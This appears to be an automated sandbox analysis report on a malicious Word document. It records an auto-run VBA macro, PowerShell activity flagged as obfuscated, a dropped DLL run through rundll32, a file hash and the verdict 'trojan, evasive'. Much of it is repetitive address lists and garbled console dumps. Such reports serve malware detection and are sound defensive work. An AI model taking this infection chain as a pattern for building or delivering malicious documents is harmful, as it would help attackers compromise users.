Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072533C	12_2_0072533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00714121	12_2_00714121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00719716	12_2_00719716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071FB04	12_2_0071FB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007183F0	12_2_007183F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072A7E4	12_2_0072A7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00724DAD	12_2_00724DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072C19B	12_2_0072C19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071F471	12_2_0071F471
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00721C79	12_2_00721C79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071427A	12_2_0071427A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00728E79	12_2_00728E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00722A7D	12_2_00722A7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00725060	12_2_00725060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00720C65	12_2_00720C65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071D668	12_2_0071D668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071766F	12_2_0071766F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00727A50	12_2_00727A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071D04B	12_2_0071D04B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071884A	12_2_0071884A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00714828	12_2_00714828
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00713618	12_2_00713618
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00711600	12_2_00711600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00723600	12_2_00723600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00729AE2	12_2_00729AE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071B0E1	12_2_0071B0E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00717AE4	12_2_00717AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072A2EA	12_2_0072A2EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007212D1	12_2_007212D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007276D5	12_2_007276D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071DEC9	12_2_0071DEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007268CB	12_2_007268CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071D2CE	12_2_0071D2CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007112B6	12_2_007112B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00716ABA	12_2_00716ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00720EA0	12_2_00720EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071C8A5	12_2_0071C8A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007272AE	12_2_007272AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072A094	12_2_0072A094
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071F099	12_2_0071F099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072D08F	12_2_0072D08F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00728978	12_2_00728978
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00725B60	12_2_00725B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00718F55	12_2_00718F55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071DB5B	12_2_0071DB5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072C95E	12_2_0072C95E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00714D5F	12_2_00714D5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00716342	12_2_00716342
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00712746	12_2_00712746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00723745	12_2_00723745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00725D36	12_2_00725D36
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071E924	12_2_0071E924
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071BB28	12_2_0071BB28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071792C	12_2_0071792C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00728313	12_2_00728313
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00722513	12_2_00722513
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00720705	12_2_00720705
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00715D0E	12_2_00715D0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007133F4	12_2_007133F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071B7F8	12_2_0071B7F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007239E1	12_2_007239E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071C3C2	12_2_0071C3C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072CBB0	12_2_0072CBB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071FFB5	12_2_0071FFB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007159B8	12_2_007159B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007181A0	12_2_007181A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071B3A2	12_2_0071B3A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00713FAB	12_2_00713FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_007167AC	12_2_007167AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00718994	12_2_00718994
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00713B97	12_2_00713B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0072B19F	12_2_0072B19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0071EF80	12_2_0071EF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D6005	13_2_001D6005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D3C28	13_2_001D3C28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DC44B	13_2_001DC44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D7C4A	13_2_001D7C4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E1079	13_2_001E1079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DE871	13_2_001DE871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E0065	13_2_001E0065
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E4460	13_2_001E4460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DE499	13_2_001DE499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E9494	13_2_001E9494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001EC48F	13_2_001EC48F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DBCA5	13_2_001DBCA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E5CCB	13_2_001E5CCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DA4E1	13_2_001DA4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E1913	13_2_001E1913
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D510E	13_2_001D510E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E5136	13_2_001E5136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D6D2C	13_2_001D6D2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DDD24	13_2_001DDD24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D3521	13_2_001D3521
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001EBD5E	13_2_001EBD5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D415F	13_2_001D415F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E7D78	13_2_001E7D78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001EA59F	13_2_001EA59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001EB59B	13_2_001EB59B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D7D94	13_2_001D7D94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D4DB8	13_2_001D4DB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E41AD	13_2_001E41AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D75A0	13_2_001D75A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E2DE1	13_2_001E2DE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D2A18	13_2_001D2A18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D0A00	13_2_001D0A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E2A00	13_2_001E2A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F1600	13_2_001F1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E6E50	13_2_001E6E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E1E7D	13_2_001E1E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D367A	13_2_001D367A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E8279	13_2_001E8279
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D6A6F	13_2_001D6A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DCA68	13_2_001DCA68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D628A	13_2_001D628A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D5EBA	13_2_001D5EBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F12B6	13_2_001F12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D06B6	13_2_001D06B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E66AE	13_2_001E66AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E02A0	13_2_001E02A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E6AD5	13_2_001E6AD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E06D1	13_2_001E06D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DC6CE	13_2_001DC6CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DD2C9	13_2_001DD2C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E96EA	13_2_001E96EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D6EE4	13_2_001D6EE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E8EE2	13_2_001E8EE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D8B16	13_2_001D8B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E7713	13_2_001E7713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DFB05	13_2_001DFB05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DEF04	13_2_001DEF04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E473C	13_2_001E473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DAF28	13_2_001DAF28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DCF5B	13_2_001DCF5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D8355	13_2_001D8355
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E4B48	13_2_001E4B48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D1B46	13_2_001D1B46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E2B45	13_2_001E2B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D5742	13_2_001D5742
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DD760	13_2_001DD760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E4F60	13_2_001E4F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D2F97	13_2_001D2F97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DE380	13_2_001DE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DF3B5	13_2_001DF3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001EBFB0	13_2_001EBFB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D5BAC	13_2_001D5BAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D33AB	13_2_001D33AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DA7A2	13_2_001DA7A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DB7C2	13_2_001DB7C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001DABF8	13_2_001DABF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D27F4	13_2_001D27F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D77F0	13_2_001D77F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001E9BE4	13_2_001E9BE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00216C05	14_2_00216C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00216E8A	14_2_00216E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00214121	14_2_00214121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0022533C	14_2_0022533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021FB04	14_2_0021FB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00219716	14_2_00219716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021E360	14_2_0021E360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00225748	14_2_00225748
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00214D5F	14_2_00214D5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00224DAD	14_2_00224DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0022C19B	14_2_0022C19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0022A7E4	14_2_0022A7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_002183F0	14_2_002183F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00214828	14_2_00214828
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00211600	14_2_00211600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00223600	14_2_00223600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00213618	14_2_00213618
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00225060	14_2_00225060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00220C65	14_2_00220C65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021D668	14_2_0021D668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021766F	14_2_0021766F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021F471	14_2_0021F471
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00221C79	14_2_00221C79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0021427A	14_2_0021427A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00228E79	14_2_00228E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00222A7D	14_2_00222A7D

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: Doc.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module R4bm01nsbtdt1, Function Document_open			Name: Document_open

Document contains embedded VBA macros

Source: Doc.doc

OLE indicator, VBA macros: true

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll 5E9F4504B7E0938A2B2EB9A7F090BE9F4B1101AA3BE145A3B5895CB14BACD0EF

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 1000B078 appears 46 times

Yara signature match

Source: 00000005.00000002.2093207161.0000000001CB4000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2093170388.00000000002B6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: Yvtlx6p4.dll.5.dr

Static PE information: Section: .rsrc ZLIB complexity 0.999343417553

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@30/9@1/4

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_002E6686 CreateToolhelp32Snapshot,

17_2_002E6686

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$Doc.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC35E.tmp

Jump to behavior

Source: Doc.doc

OLE indicator, Word Document stream: true

Source: Doc.doc	OLE document summary: title field not present or empty
Source: Doc.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ............,........................... .<.......<.....................H...............#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ............,...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K........~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j..... ..............................}..v....X.......0.r...............~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................f..j....................................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................f..j......~.............................}..v............0.r.............8.~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j....................................}..v....X.......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j..... ..............................}..v............0.r...............~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j.....H~.............................}..v....X.......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7...............&..j....................................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j.....H~.............................}..v....X.......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C...............&..j....................................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j.....H~.............................}..v....X.......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O...............&..j....................................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.r.............XE~.....(.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[...............&..j....`...............................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.2.............}..v............0.r.............XE~.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g...............&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s...............&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E..........................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j.....H~.............................}..v....."......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............&..j.....#..............................}..v....($......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j.....H~.............................}..v.....*......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3...............&..j.....+..............................}..v....(,......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j.....H~.............................}..v.....2......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?...............&..j.....3..............................}..v....(4......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j.....H~.............................}..v.....:......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K...............&..j.....;..............................}..v....(<......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j.....H~.............................}..v.....B......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W...............&..j.....C..............................}..v....(D......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j.....H~.............................}..v.....J......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c...............&..j.....K..............................}..v....(L......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j.....H~.............................}..v.....R......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o...............&..j.....S..............................}..v....(T......0.r..............E~.............................	Jump to behavior
